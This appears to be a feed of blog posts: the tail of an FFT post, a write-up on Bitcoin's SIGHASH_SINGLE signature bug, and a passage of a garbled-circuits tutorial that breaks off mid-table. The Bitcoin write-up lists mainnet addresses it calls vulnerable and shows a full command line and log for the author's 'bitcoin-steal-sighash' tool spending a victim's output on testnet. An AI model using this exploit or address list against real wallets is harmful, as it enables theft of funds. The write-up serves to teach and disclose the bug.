Now, if instead of 3, we a very large prime, say $3259$, then each entry in the output will require at least $3259$ field operations to be computed taking us closer to the old school-book algorithm and slowing down our algorithm. Therefore, given a polynomial $P(x)$ of degree which is not a power of $2$ we look at $P$ as a polynomial of degree $\lt 2^k$ for some $k$ and solve an FFT of size $2^k$. This may not work if we specifically are interested in the evaluations of some PROU of order $n$ which is not a power of 2.
It would have been really nice if finite fields had PROUs of smooth orders so we could use them to construct efficient FFTs. The problem is that finite fields don’t always have a root of unity of order $n$ for any $n$, so computing FFTs of the closest power of $2$ may not work. To make things clear, let’s look at secp256k1
The order of the generator of secp256k1 is the prime number: p=0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141
.
The scalars we use are elements in the field $\mathbb{Z}/p\mathbb{Z}$. So, the multiplicative group is of size $p-1$ whose factorization is $2^6\cdot 3 \cdot 149 \cdot 631 \cdot p_0 \cdot p_1 \cdot p_2$ where $p_0,p_1,p_2$ are some very large primes.
The order of each non-zero element in the field must divide $p-1$ and therefore we don’t have a PROU for any order of our choice. Actually, even if we consider $149$ and $631$ to be “small primes”, the largest FFT we can compute over this field is of size $2^6\cdot 3 \cdot 149 \cdot 631=18,051,648$.
In other words, the largest “smooth” PROU we can find in this field group is of order $18,051,648$. Since the size of the fields is directly connected to the size of the group of scalars in the secp256k1 curve, this may prevent from us constructing efficient FFTs doing interesting things relating to this curve.
One implication of this is that many projects that rely on FFTs of very high orders use $\text{BLS12-381}$ curve which has $2^{32}$ as a factor of the multiplicative group of the scalars. If you want to compute FFTs over the scalar field of some curve which doesn’t have a large smooth factor, you may consider other options such as using ECFFTs.
In this post we have introduced FFTs and why they are needed. We have also presented one of the most popular FFT algorithms, the Cooley-Tuckey algorithm and its inverse, the IFFT algorithm.
Just a list of abbreviations I used in this post:
To better explain it we’ll first have to get acquainted a little bit deeper with Bitcoin’s transaction format. So a bitcoin transaction has the following fields.
version
.witnessFlag
, optional.inputsNum
, the number of inputs in the transaction.inputs
, an array of length inputsNum
describing the inputs of the transaction.outputsNum
, the number of outputs in the transaction.outputs
, an array of length outputsNum
describing the outputs of the transaction.witnessInfo
, optional, exists only if witnessFlag
is specified.locktime
, can be used to apply some restrictions on the outputs of this transaction.We will not be explaining the meaning of all fields with all edge cases involved, but the general sense you should get is that transactions are typically the conversion of a set of existing unspent-transaction-outputs (UTXOs) into a set of new UTXOs.
The existing UTXOs, spent in the transaction are referred to as the inputs of the transaction. When creating a transaction, we specify in field 3 the number of inputs and in field 4 the inputs themselves. Similarly, new UTXOs, created in the transaction are referred to as the outputs of the transaction. Thus, when creating a transaction, we specify in field 5 the number of outputs and in field 6 the outputs themselves.
Let’s looks at the inside of these inputs and outputs and what information is required to encode them. We shall begin with outputs since they are simpler and contain fewer pieces of information. An output of a transaction contains the following two attributes:
value
, how many satoshis are stores in this output.scriptPubkey
, who can spend the coins in this output.While the value
attribute is easy to grasp, you can think of the scriptPubkey
attribute as a puzzle that whoever wants to spend this output has to solve.
When you’re sending some coins to your friend, she gives you her Bitcoin address, this address is directly decoded in this scriptPubkey
address, so your Bitcoin wallet will specify in the output a puzzle that only your friend can solve, using her private key.
This puzzle is specified under the hood using a “programming language” dedicated to Bitcoin called “script” (yeah the name isn’t that original…).
You can find further information about Bitcoin scripts here.
Great, now let’s move to the inputs. An input contains the following four fields:
txid
, the hash of the transaction which contains the output we’re are spending in this input.vout
, the transaction with hash txid
may contain multiple outputs, this field specifies which of the outputs of that transaction are we spending in this input.scriptSig
, the solution to the puzzle of the output being spent, which typically includes a digital signature.sequence
, used for RBF signalling, irrelevant for this article.With all given information, the following is a schematic format of the transaction:
Let’s have an example, consider Alice has 1 BTC she received at transaction with txid ab01...0342
(we’ll be using abbreviated notation instead of writing a long transaction ID).
Thus, this transaction has a single output worth 1 BTC which can only be spent using Alice’s private key.
Alice wants to send this 1 BTC to Bob.
To do so, she asks from Bob for his address which encompasses Bob’s public key.
Next, she creates a transaction with a single input, referring to the first output from previous transaction (so vout = 0
and txid = ab01...0342
), she computes her signature using her private key for this input, thereby authorizing the payment and attaches it to the scriptSig
field in the input.
In the outputs section of the transaction she creates a single output with value = 100,000,000
, which are 100,000,000 satoshis, that is single BTC and is writing Bob’s public key in the scriptPubkey
field.
The result transaction, ignoring irrelevant fields looks something like this:
Now that we know roughly how transactions work, let’s get a little bit deeper into the scriptSig
field.
In our previous example Alice was computing a signature of the transaction she was sending to Bob.
Digital signatures (such as ECDSA signatures used in Bitcoin) are considered hard to forge without owning the private key.
That means that without the private key an attacker using Alice’s previous signatures will not be able to generate a new signature authorizing the spending of one of her UTXOs.
When computing a digital signature, the signing procedure typically takes an arbitrarily sized buffer, compute the hash of the contents of this buffer and employ the mathematical procedure on the hash of the message resulting the actual signature.
So, when Alice is computing the digital signature, what exactly is this buffer that will be passed into the signing procedure?
The most common case is that all contents of the transaction (besides the signature itself, of course) are signed, this is probably what you would expect and even implement yourself if you were trying to write your own version of Bitcoin.
However, in Bitcoin other modes are available which allow the spender to sign only part of the information in the transaction to allow higher degrees of freedom and perhaps more sophisticated use cases.
The exact mode comes right after the digital signature in the scriptSig
field and is encoded using a single byte known as a SIGHASH_TYPE
.
So we already know that there is a piece of information encoded in the scriptSig
field of each input of a transaction that is responsible to dictate what pieces of information in the transaction will the spender sign on.
One common feature to all possible modes is that the input being spent (i.e. the input for which we compute the scriptSig
) is being signed.
There are six possible options for the sighash
byte which will be introduced using the following section.
Let’s say we have a transaction with two inputs and three outputs and we are computing the signature for the scriptSig
in the second input.
In the following we present all sighash types accompanied with a visual representation of the said transaction where the inputs / outputs that are signed are colored in green.
The first sighash type is SIGHASH_ALL
in which the all inputs and all outputs of the transaction are being signed.
Almost all signatures in the blockchain of Bitcoin are accompanied with this kind of sighash type.
In this sighash type all outputs are signed but the SIGHASH_ANYONECANPAY
signifies that only one of the inputs is signed, that is the input for which this sighash type is specified in.
This means, as its name suggests that anyone else who has this transaction can join and add inputs to this transaction as long as it preserves the same outputs that are signed.
In other words, since the spender isn’t signing other inputs except his own input, anyone else can take this transaction and modify it by adding another input as long as he doesn’t modify the outputs that are provided with the original transaction.
Consider the following scenario, you and three other friends would like to buy a gift to another friend for her birthday.
The gift costs 10000 satoshis which should be sent to the address of the merchant and you have decided to split the payment evenly, so each one of you pays 2500 satoshis.
To accomplish the payment, you and your friends will sign (separately) the spending of a UTXO with 2500 satoshis which will be sent to the merchant (as the first output). Notice that the output will contain the value of 10000
despite each friend signs only an input of 2500.
By merging these signed inputs you can create a valid transaction and send it to the merchant.
In this sighash type none of the outputs is signed and all inputs are signed. Therefore, when signing an input using this sighash type, the spender is saying “I’m OK with spending this input as long as the other inputs which I’m signing on are also spent. I’m also OK that the coins associated with this input will be sent to wherever the other spender decide”.
In this sighash type none of the outputs is signed and only the input being spent is signed. Therefore, when signing an input using this sighash type, the spender is saying “I’m OK with spending this input and I really don’t care what will eventually happen with it”. Anyone who receives such an input can take it and spend it in any way the see fit. This is because the sighash doesn’t apply and constraints on any other input or output in the transaction. What you may expect to happen eventually is that the miner who sees a transaction containing such a sighash type, to take the input to himself. And this just might happen!
In this sighash type all inputs are signed and only one output is signed.
Namely, if we are trying to spend input number 2 (therefore, computing the scriptSig
for that input), we will sig on the output with the matching index, in our case that would be output number 2.
When spending such an input the spender is saying “I’m OK with spending this input in any transaction who contains this specific output and as long as all other inputs who I’m signing on are also taking part in the transaction”.
The other parties signing the rest of the inputs can add outputs to the transaction as they see fit, as long as the value of all outputs isn’t above the value of all inputs, of course.
In this sighash type, only one input is signed and one output is signed.
Just like SIGHASH_SINGLE
, the output which will be signed is the output with the matching index to the index of the input being signed.
When spending an input using this sighash the spender is saying “I’m OK with spending this input in any transaction who also contains this output on which I’m signing”.
Now we know what is a sighash and what are the six types of sighashes it’s time to share the bug with you.
The issue lies within the definition of SIGHASH_SINGLE
and SIGHASH_SINGLE | SIGHASH_ANYONECANPAY
.
Specifically, both sighash types sign a single output with the matching index as the index of the input for which this sighash mode is specified.
But what if no such output exists?
What do we hash in that case?
Well, this is a great question so please first stop and try to think what you might have expected to happen in such a scenario.
While you have probably thought of either forbidding such transactions from being mined (as part of Bitcoin’s consensus rules) or simply interpreting the sighash type as SIGHASH_NONE
or SIGHASH_NONE | SIGHASH_ANYONECANPAY
, hereby signing only on the inputs, neither of these is what actually happening.
What happens is, the signer simply signs the hash of the 256-bit little-endian number “0000…0001”, which we will simply call “1” for the sake of brevity.
That is, while typically messages are hashed and signed, in this case no message is provided and the signing algorithm is directly given the said value of “1”.
Can you think of any meaningful implication for this?
The most prominent implication of this behavior, is that if an attacker manages to obtain, by any mean, the signature of “1” from your private key, he will immediately gain indefinite access to your account.
In other words, if you publish a signature on the hash value “1”, you can kiss goodbye to all your funds from the associated address.
Why is that?
How can this be exploited?
If you publish a signature on hash “1” using the secret key associated with your Bitcoin address, the attacker can take this signature, stick it in the scriptSig
field of an input with sighash type of SIGHASH_SINGLE
and place this input as the second input in a transaction with two inputs, where the first input would be any UTXO owned by the attacker which the attacker can spend.
The single output of this transaction will be destined to the attacker with all value from both inputs (his own input and the victim’s input) sent to him.
Let’s visualize the attack and exemplify it, consider we have a victim with some UTXO owned by him with value of Y
satoshis and we have a signature of the victim on the hash value “1”.
On the side there’s an Attacker with a UTXO owned by him with value of X
satoshis.
The “ingredient” for the attack, therefore, would look like this:
The attacker, using his private key and these inputs will create the following transaction:
Pay extra attention to the following details:
SIGHASH_SINGLE
, that means it will have all inputs and the single matching output.This is it, that is the actual bug and that’s how it can be exploited.
Yes, this bug was created by no other than the legendary Satoshi Nakamoto, go ahead and look at it yourself.
To do so, download the first version of Bitcoin’s v0.1.0 source code from Nakamoto Institute using this link.
Navigate to script.cpp
file at line 818 you can find the SignatureHash
function containing the following piece of code:
uint256 SignatureHash(CScript scriptCode, const CTransaction& txTo, unsigned int nIn, int nHashType)
{
if (nIn >= txTo.vin.size())
{
printf("ERROR: SignatureHash() : nIn=%d out of range\n", nIn);
return 1;
}
//...Some irrelevant code...
}
As you can see, if the variable nHashType & 0x1f
is equal to SIGHASH_SINGLE
then the given input we are processing contains a signature with sighash of type SIGHASH_SINGLE
, so we’re looking for the matching output and if it doesn’t exist, we return the value 1
as an error code.
Next, the SignatureHash
function is called from the CheckSig
function (also at script.cpp
line 881)
bool CheckSig(vector<unsigned char> vchSig, vector<unsigned char> vchPubKey, CScript scriptCode,
const CTransaction& txTo, unsigned int nIn, int nHashType)
{
// ...Some irrelevant code...
if (key.Verify(SignatureHash(scriptCode, txTo, nIn, nHashType), vchSig))
return true;
return false;
}
So as part of the signature checking the code was calling the SignatureHash
function and sent its output value directly to the key.Verify
function without checking for the error code.
Because of this bug, the consensus of Bitcoin allows for inputs signed with SIGHASH_SINGLE to be the ECDSA signature with the private key on the hash of the 256-bit value of 1.
To prevent users from accidentally triggering this bug, thereby publishing a signature on the hash value of “1”, the first thing that happened was that Bitcoin-core’s code prevents the user from signing such transactions as written in the code here.
Taproot addresses, introduced in BIP-341 as part of the taproot upgrade, can’t create signatures with SIGHASH_SINGLE
without a matching output as this will invalidate such transactions.
I’ve written a tool called bitcoin-scan-sighash
which can connect to a local instance of a bitcoin-core node and scan the blockchain for such instances, you can check the repo here.
Using this tool I have compiled a list of numerous addresses who are vulnerable to the bug.
112jWgS2NYh6bwn2BWzNcPgELXxLxftx31
112RCi89FwLb64LePtxCHB86jY4BBAhLiP
1134V46popKAN2QLh1jDMCKPA6fjRnHTAP
1135zjYCkCGJUnuVG7yZcSFuLofcM5g2T
113VrEwZ7L77yFHD2yoKR8qZFr5Xuq8Khs
114cLg5Gc3hkkWuMN5B55YVLzPxS49VMvc
12S88cuMiUA7JdGsHTbKsXezUFzE2nNjFt
15iwPhxErFDyQTJew81ok9hCbQNhyWuXq1
19gVuEdDZ9XfmRSjLeAnywJ1zJoGig7qxq
19MxhZPumMt9ntfszzCTPmWNQeh6j6QqP2
1BqtnfhJS75AXKuDUAJ22XxU2QHNnENAcH
1CeBmgAuBj8WVhwpEVqPPMyV36uHZRfevy
1CgCMLupoVAnxFJwHTYTKrrRD3uoi3r1ag
1cSSVdjkGRJJRdsFH3mfmDEQHGpyz8jka
1Cy7gqTPMKDYpVS55MX7qemJBCE7tYbQY
1EaVdukMkbwrmsndGgwoTw4jR8im9TGhZ7
1EPPr3UQf6YMhEtejpjNUK6bVZ5HHLXjZ5
1FFtUDpR2CYZDc9TxzNpbNP1U6cXQ9Lq5c
1FjHqLzpeoMtaYa8MpbiYgbWihNGFocQno
1FoELHXby4WYTVXxCcXf8nrnz3VvNUG2EG
1fVuHc1ho7HhU9t8gk5xDDQzoiaEKShPs
1Hh9Uur2QuCLBT7RQxPkSGrYPb6Vbd7iAs
1JEM3niCozNRksJf3iYmBS99Yr1xUGc3KF
1KxmSmcMTmPvU1qSLYpJLrqnSzBoQ53NXN
1L5G9BRZ2o6HsKkMBJcUzg6nK1CgPjmgsz
1L5vVsCYa5cC4xttt2WnbT6UtkjrxwyskV
1YLtj6tygZh35AUKTqvxHedpydQbc1MaP
Notice that this tool also outputs the exact txid
and vout
in which the scriptSig
contains a SIGHASH_SINGLE
(or the SIGHASH_SINGLE | SIGHASH_ANYONECANPAY
variant).
So, it would be nice if we could put our knowledge to the test. In theory if any of these addresses had a positive balance, we could have stolen their coins using our knowledge. Since they are emptied (are they?), we can try doing something else, sending a small amount of coins to such vulnerable address and then “steal” the coins sent there.
In order to do so, I’ve written another tool called bitcoin-steal-sighash
available here.
Let’s give an example of how we can use it.
Let’s say we have an address that is vulnerable to the SIGHASH_SINGLE
bug, that means we have some scriptSig
of some input within some transaction on which the owner of this address have signed “1”.
To save you the effort, I have created such a vulnerable address on the testnet of Bitcoin.
The address is mhHZmAp9ZAD2GuFqvg9ekQk9WwGX5iQGxt
and the vulnerable scriptSig
is:
4730440220569956d2c2cbe1f75f1c1b2ff2180aabe0dd230a65636607db2bd17dc53cb30f02207078a47daa5f65c12f729323b55e0321576f6b0d50b374a89ee48b0e2f549e2a032102773ed626ccf14ce7317fc0bcc8c657df61a6b2267966a004b070d0c2dfe1e70f
So feel free to use it! In fact, let’s use it now.
Now, before running the tool (on testnet) you have to run a testnet node, that means you’ll have to modify your node’s configuration so that it will connect to the testnet, typically all it takes is to add the testnet=1
line inside your node’s configuration file or run your node with the -testnet
flag.
This is done on purpose to make it a little bit harder for you to run this on mainnet so you won’t accidentally lose your precious coins. Please don’t run this on mainnet unless you know what you’re doing!
To use it we’ll have to specify the following:
--attacker-address
), this is our address (since we’re the attackers!), stolen funds will be sent to this address. Notice that to employ this attack you’ll have to own some coins in this address (since we need some initial utxo to spend). You can use any Bitcoin-testnet faucet, I used this one.txid
(using the --steal-txid
flag) and the vout
(using the --steal-vout
flag).scriptSig
which contains the signature on “1” signed by the victim.Using these inputs we can run our tool:
> bitcoin-steal-sighash \
--attacker-address mp4TunkzwEbpmRQfz6tRaFAcQYmBoFgQKP \
--steal-txid 410978b8ec22ed9c15f9869c3de45f1df1cc72dcad4ac9804f16eb9f6632aadb \
--steal-vout 1 \
--vuln-script 4730440220569956d2c2cbe1f75f1c1b2ff2180aabe0dd230a65636607db2bd17dc53cb30f02207078a47daa5f65c12f729323b55e0321576f6b0d50b374a89ee48b0e2f549e2a032102773ed626ccf14ce7317fc0bcc8c657df61a6b2267966a004b070d0c2dfe1e70f
[00:00:00.000] (7fba1c3c57c0) INFO Using .cookie auth with path: /home/matan/.bitcoin/testnet3/.cookie
[00:00:00.000] (7fba1c3c57c0) INFO Using url: http://127.0.0.1:18332
[00:00:00.001] (7fba1c3c57c0) INFO Spending utxo: txid: 410978b8ec22ed9c15f9869c3de45f1df1cc72dcad4ac9804f16eb9f6632aadb, vout: 0
[00:00:00.008] (7fba1c3c57c0) INFO steal_tx: Transaction { version: 2, lock_time: 0, input: [TxIn { previous_output: OutPoint { txid: 410978b8ec22ed9c15f9869c3de45f1df1cc72dcad4ac9804f16eb9f6632aadb, vout: 0 }, script_sig: Script(OP_PUSHBYTES_71 304402203a52f4e75e07f1745a99c52a6cab35efebf3b6748ddb29a580e5c6f09c8db0b10220418b2c9b752b7617fb3bb255842e5dc4baa8ff6595ca66b8a118e2a0091d125a03 OP_PUSHBYTES_33 02e9ebcfe1ada8a3ebf9c9978de06b8290a568e78c19411c261909890006b1273c), sequence: 4294967295, witness: [] }, TxIn { previous_output: OutPoint { txid: 410978b8ec22ed9c15f9869c3de45f1df1cc72dcad4ac9804f16eb9f6632aadb, vout: 1 }, script_sig: Script(OP_PUSHBYTES_71 30440220569956d2c2cbe1f75f1c1b2ff2180aabe0dd230a65636607db2bd17dc53cb30f02207078a47daa5f65c12f729323b55e0321576f6b0d50b374a89ee48b0e2f549e2a03 OP_PUSHBYTES_33 02773ed626ccf14ce7317fc0bcc8c657df61a6b2267966a004b070d0c2dfe1e70f), sequence: 4294967295, witness: [] }], output: [TxOut { value: 365921, script_pubkey: Script(OP_DUP OP_HASH160 OP_PUSHBYTES_20 5db69f9669402ac82b24302665d7a5e72e62fbfc OP_EQUALVERIFY OP_CHECKSIG) }] }
[00:00:00.008] (7fba1c3c57c0) INFO steal_tx raw: 0200000002dbaa32669feb164f80c94aaddc72ccf11d5fe43d9c86f9159ced22ecb8780941000000006a47304402203a52f4e75e07f1745a99c52a6cab35efebf3b6748ddb29a580e5c6f09c8db0b10220418b2c9b752b7617fb3bb255842e5dc4baa8ff6595ca66b8a118e2a0091d125a032102e9ebcfe1ada8a3ebf9c9978de06b8290a568e78c19411c261909890006b1273cffffffffdbaa32669feb164f80c94aaddc72ccf11d5fe43d9c86f9159ced22ecb8780941010000006a4730440220569956d2c2cbe1f75f1c1b2ff2180aabe0dd230a65636607db2bd17dc53cb30f02207078a47daa5f65c12f729323b55e0321576f6b0d50b374a89ee48b0e2f549e2a032102773ed626ccf14ce7317fc0bcc8c657df61a6b2267966a004b070d0c2dfe1e70fffffffff0161950500000000001976a9145db69f9669402ac82b24302665d7a5e72e62fbfc88ac00000000
[00:00:00.010] (7fba1c3c57c0) INFO https://blockstream.info/testnet/tx/195f980f04e81444aa37aaa9bb6bdf40295776ba5fa36e96ed28da6f5b55dd7d?input:0&expand
[00:00:00.010] (7fba1c3c57c0) INFO https://blockstream.info/testnet/address/mp4TunkzwEbpmRQfz6tRaFAcQYmBoFgQKP
[00:00:00.010] (7fba1c3c57c0) INFO Finished, leaving!
You’ll probably have to send some testnet coins to the vulnerable address first and then using the sent coins you can steal those back! When our tool finishes its execution (successfully) it writes the link to Blocksteam’s explorer, you can check the links in the example to see how a successful execution looks like.
I hope you’ve learnt something new about Bitcoin and how the different parts of it come together. Try and imagining how difficult it is to design and maintain systems which rely on distributed consensus and how one tiny bug has remained with us for over 13 years.
In one address on the mainnet I’ve also hidden a (very) small bounty that you can steal if you follow everything here correctly. So go ahead and good luck! The winner is kindly requested to get in touch with me on Twitter or Telegram. If you have any questions feel free to ask on Twitter / Telegram too.
]]>In this article I’d like to give some introduction to Garbled Circuits. If you have reached to this article and are wondering what is a Garbled Circuit, you are probably at least somewhat familiar with Multiparty-Computation and cryptography.
To make things clear, let’s say that MPC is a sub-domain of cryptography that deals with methods which allow a set of mistrusting parties, each holding its own input, to compute a function of those inputs such that none of the parties learn anything about the (private) input of the other parties, besides what can be trivially inferred about it from the output.
For example, consider Yao’s Millionaires Problem in which a two millionaires would like to know which of them is richer without disclosing their fortune.
Each millionaire’s input would be the value of its fortune and the function to be evaluated (which returns either True
or False
) is whether the first input is bigger than the second input.
Now that the setting is clearer, I can say that Garbled Circuits is a protocol, allowing two parties $\mathcal{P}_A,\mathcal{P}_B$ with inputs $i_A,i_B$ respectively, to compute a function of their inputs: $f(x,y)$ such that each party will learn only $f(i_A,i_B)$. How awesome is that?
In this article I’d like to give some sense about how Garbled Circuits are built and how does the magic work. I’ve found this topic tends to be cryptic to some friends and colleagues and thought creating this document will give some intuition about the building blocks of GCs. This article does not intend to be rigorous and I’ll not be proving any security property of GCs. I find learning crypto topics as a multi-tiered-procedure, where first gaining a general sense about the cryptographic entity and only later giving a more explicit, rigorous and formal definitions and proofs about this entity makes complex topics easier to grasp. I will also not consider some extensions of GCs for more than two parties while such extensions do exist. The interested reader can refer to Oded Goldreich’s article to learn more about it. Notice that Oded is using the term “Scrambled Circuit” instead of a “Garbled Circuit”.
In this article we assume the Semi-Honest model of security. By making this assumption we disregard any scenario in which one of the parties deviates from an agreed-upon protocol to gain extra information. In other words, we assume the parties are honest-but-curious, so they follow the protocol precisely as stated but may be interested in gaining extra information from the messages they receive along the process. We will explain why such honest-but-curious parties may not gain any information except for the output of the function being computed (without too much formality involved). We will not approach the more complex problem of building a GC protocol in the Malicious-Adversary model, where paries may deviate from the prescribed protocol arbitrarily.
The collaborting parties $\mathcal{P}_A, \mathcal{P}_B$ hold inputs $A,B$ respectfully and wish to jointly compute a function $f(A,B)$. The inputs $A,B$ are represented each as a vector of bits. When building a Garbled Circuit for the function $f$ the first thing one does is representing $f$ as a boolean circuit, composed of boolean gates. For simplicity we will deal with two types of gates:
It is a well-known result that any boolean function can be represented as a boolean circuit composed only of AND gates and XOR gates. Therefore, if we can show that the XOR and AND gates can be computed by two parties such that the input privacy is preserved, and that we securely compose these gates we can achieve our desired goal.
We will not discuss how can a function be represented as a boolean circuit, as this for itself is an active research field. Thus at this point we will simply assume that such representation does exist for our given function.
To make the construction more concrete and approachable and we will discuss a specific instance of the problem for a rather simple function $f$. Later, we give a generalized algorithm for any function. The function we will deal with in our construction is the function that takes two numbers of two binary digits each and tells whether they are the binary negation of each other. In other words, if the first input is equal to the number obtained by taking the second input and flipping all the bits representing it. For example, $f(2,1)=1$ because 2’s binary representation is 10 and 1’s binary representation is 01, and since 10 is obtained by flipping all the bits in 01 then $f(2,1)=1$. To be precise, the numbers (inputs) of the parties will be $A=(a_0,a_1)$ and $B=(b_0,b_1)$ where $a_0,a_1,b_0,b_1$ are bits and $A,B$ are the input numbers with the binary representation of $a_1a_0$ and $b_1b_0$ respectively. The single bit of output of the function is $C=(c_0)$. For example, if the input of party $\mathcal{P}_A$ is the number $2$, is will be represented as $A=(0,1)$ and the input of party $\mathcal{P}_B$ is the number $1$. Then the output of the function will be $C=(1)$.
The boolean circuit for the additional function is:
We have annotated each wire with a number which we will use later in our building.
In this subsection we’ll try to build a GC for our function $f(A,B)$ taking as input two vectors of two bits each, representing two numbers, and sending as output a “vector” of a single bit. In the beginning we have two parties who have the boolean circuit for $f$. Now, let’s think, if we were trying to solve this problem ourselves what would be the first thing we were trying to tackle? Well, since none of the parties can learn nothing besides the output of the computed function, party $\mathcal{P}_A$ can’t simply send its input $A$ to party $\mathcal{P}_B$. If it did, party $\mathcal{P}_B$ could compute $f(A,B)$ and send it to $\mathcal{P}_A$, but by doing so $\mathcal{P}_B$ would also learn $A$, the input of $\mathcal{P}_A$ which violates our privacy requirements. Therefore, the information $\mathcal{P}_A$ should send to $\mathcal{P}_B$ shall not disclose its input but would still allow $\mathcal{P}_B$ to evaluate the function. So, the approach we shall take is a little bit different. Instead, $\mathcal{P}_A$ will send a garbled version of the circuit to $\mathcal{P}_B$ and some “instructions” for $\mathcal{P}_B$ about how to “translate” its input ($B$) into the garbled circuit. Next, $\mathcal{P}_B$ will evaluate the garbled circuit which would yield a garbled output, and send this output to $\mathcal{P}_A$, who will ungarble the garbled output into the correct output and send it to $\mathcal{P}_B$. Garbling the circuit, done by $\mathcal{P}_A$ will require:
In the following subsections we will explain how these can be done.
Let’s consider a logical gate with two input wires $(w_a,w_b)$ and a single output wire $(w_c)$. So when the values that are fed into the input wires are set to specific values, the output wire will hold the correct value obtained from applying the logical function of the gate on the values fed into it from the two input wires. The functionality of the logical gate can be described using a truth table, a table which gives the value of the output wire $(w_c)$ to each of the possible four combinations of the input wires $w_a, w_b$. For example, the truth table of a logical-AND gate we have in our boolean circuit is the following:
$w_a$ | $w_b$ | $w_c$ |
---|---|---|
0 | 0 | 0 |
0 | 1 | 0 |
1 | 0 | 0 |
1 | 1 | 1 |
To make things clear, the first line in the table, for example, means that if the input wires w_a and w_b take the values of and , than the output wire $w_c$ will take the value of as well, which is the logical-AND of the two inputs. While it’s a common practice, it’s important to recall that the value of represents a logical “False” and the value of 1 is representing a logical “True”.
The truth table of a logical-XOR gate is the following:
$w_a$ | $w_b$ | $w_c$ |
---|---|---|
0 | 0 | 0 |
0 | 1 | 1 |
1 | 0 | 1 |
1 | 1 | 0 |
We will garble the truth table by assigning two encryption keys to each wire in the circuit. So, for example consider our circuit with seven different wires, thus we will generate for each wire $i$ two keys $K_i^0$ and $K_i^1$. Intuitively, we need two keys to represent the two possible states of the wire, where it either carries the value of “0” or the value of “1”. The keys are of a symmetric encryption scheme, so the key is used both for encryption and decryption. Let’s zoom-in on a specific gate in the circuit, for instance, our logical XOR gate with input wires 1 and 2 and output wire 6. Wire 1 will have two keys $K_1^0$ and $K_1^1$. Wire 2 will have two keys $K_2^0$ and $K_2^1$ and output wire 6 will have two keys for it $K_6^0$ and $K_6^1$. Next, we can garble the truth table in the following way. For each line in the original (ungarbled) truth table, taking input values $x$ on wire 1 and $y$ on wire 2 and mapping them into output $z$ on wire 6 ($x,y,z$ are all one bit wide) we can create a line in the garbled truth table mapping $K_1^{x}$ and $K_2^{y}$ to $K_6^{z}$. For example, the second line in our logical-XOR gate truth table, we had inputs $x=0$ and $y=1$ mapped to the output $z=1$ (because 0 XOR 1 = 1), in the garbled table we will have $K_1^0$, $K_2^1$ map to $K_6^1$. The full garbled table of the logical-XOR will be:
Wire 1 | Wire 2 | Wire 6 |
---|---|---|
$K_1^0$ | $K_2^0$ | $K_6^0$ |
$K_1^0$ | $K_2^1$ | $K_6^1$ |
$K_1^1$ | $K_2^0$ | $K_6^1$ |
$K_1^1$ | $K_2^1$ | $K_6^0$ |
The garbling of the input is done so that for each input wire of $\mathcal{P}_A$, the party $\mathcal{P}_A$ will send the key representing the garbling of the input. For example, our XOR gate with input wires 1 and 2 and output wire 6 we know the value of wire 1 is part of the input of party $\mathcal{P}_A$. Now if the input of party $\mathcal{P}_A$ for this bit is $0$, then the garbled value of it will be $K_1^0$ and if the input is $1$ then it will be garbled to $K_1^1$ where keys $K_1^0,K_1^1$ and the two keys associated with wire $1$. Notice that party $\mathcal{P}_B$, who receives the garbled input can’t tell whether it represents the garbling of or $1$, because both keys are just random numbers and $\mathcal{P}_A$ didn’t share with $\mathcal{P}_B$ the meaning of key.
Now in order to compute the output of the gate, party $\mathcal{P}_A$ will send to $\mathcal{P}_B$:
Also notice that $\mathcal{P}_A$ must sent both keys for each wire since $\mathcal{P}_B$ can’t just tell $\mathcal{P}_A$ what its input bit is, as this will violate our privacy requirements.
As good as it may sound, things don’t end here, since at this point in order to evaluate the gate, $\mathcal{P}_B$ receives the garbling of $\mathcal{P}_A$’s input and the problem is that while $\mathcal{P}_B$ will be able to evaluate the gate, it will also be able to derive whether $\mathcal{P}_A$’s input to our XOR gate is $K_1^1$ or $K_1^0,$ thus inferring the value of the ungarbled input of $\mathcal{P}_A$.
This is possible since the ordering of the rows is such that in the first and second rows the ‘Wire 1’ column contains $K_1^0$ and in the third and forth rows it contains $K_1^1$ so $\mathcal{P}_B$ can just compare the key it got with the values in these rows and ascertain the input of $\mathcal{P}_A$ which violates our privacy requirements!
So, one thing we have to do is mix the ordering of the lines randomly. After mixing the rows, the garbled table of our XOR gate looks like this to $\mathcal{P}_B$.
Wire 1 | Wire 2 | Wire 6 |
---|---|---|
$K_1^?$ | $K_2^?$ | $K_6^?$ |
$K_1^?$ | $K_2^¿$ | $K_6^¿$ |
$K_1^¿$ | $K_2^?$ | $K_6^¿$ |
$K_1^¿$ | $K_2^¿$ | $K_6^?$ |
For completeness, the garbled table of the AND gate (with input wires 5,6 and output 7) is:
Wire 5 | Wire 6 | Wire 7 |
---|---|---|
$K_5^?$ | $K_6^?$ | $K_7^?$ |
$K_5^?$ | $K_6^¿$ | $K_7^?$ |
$K_5^¿$ | $K_6^?$ | $K_7^?$ |
$K_5^¿$ | $K_6^¿$ | $K_7^¿$ |
We use the notation of “?” and “¿” to denote that $\mathcal{P}_B$ simply doesn’t know what is the meaning of the value.
However, even if we mix the rows, $\mathcal{P}_B$ can still reveal the whole input of party $\mathcal{P}_A$. One possible attack that can be done on the AND gate is by exploiting its asymmetry in its output column of wire 7. Since this output column (of wire 7) has three rows with the same value and one row with another value, by knowing the functionality of AND gate we can tell that this last value represents a logical 1 (since only one combination of the inputs to a logical AND gate can yield the output of 1). After $\mathcal{P}_B$ derives the values of $K_7^1$ and $K_7^0$ it can also tell that the two keys of the wires 5 and 6 that yield the output of $K_7^1$ must be $K_5^1$ and $K_6^1,$ and thus $\mathcal{P}_B$ can also derive the values of $K_5^0,K_5^1,K_6^0,K_6^1$. At this point, going back to the XOR gate (with input wires $1,2$) $\mathcal{P}_B$ can tell, even without enumerating all the inputs, that if the XOR of the value it provided $(b_0)$ with the one $\mathcal{P}_A$ provided $(a_0)$ yields the $K_6^1$ then $b_0$ and $a_0$ are different and if it yields the value of $K_6^0$ with $a_0$ and thus it can infer the value of $a_0$ and learn the input of $\mathcal{P}_A$.
The issue stems from the fact that $\mathcal{P}_B$ has been able to exploit some asymmetry at the output of the AND gate. Thus, we must have each output of the garbled circuit appear only once so $\mathcal{P}_B$ should not be able to exploit such asymmetries.
This time, just like the previous one $\mathcal{P}_A$ will assign two encryption keys for each wire in the circuit, so we will use the name notation like in the previous attempt.
However, this time instead of submitting a table for each gate with multiple columns, it will send only the output column of the truth table and each output will be encrypted with the two keys of its corresponding inputs. For example, the table for the XOR gate (with input wires $1,2$) will look like this (but don’t forget $\mathcal{P}_A$ also shuffles the rows before sending them):
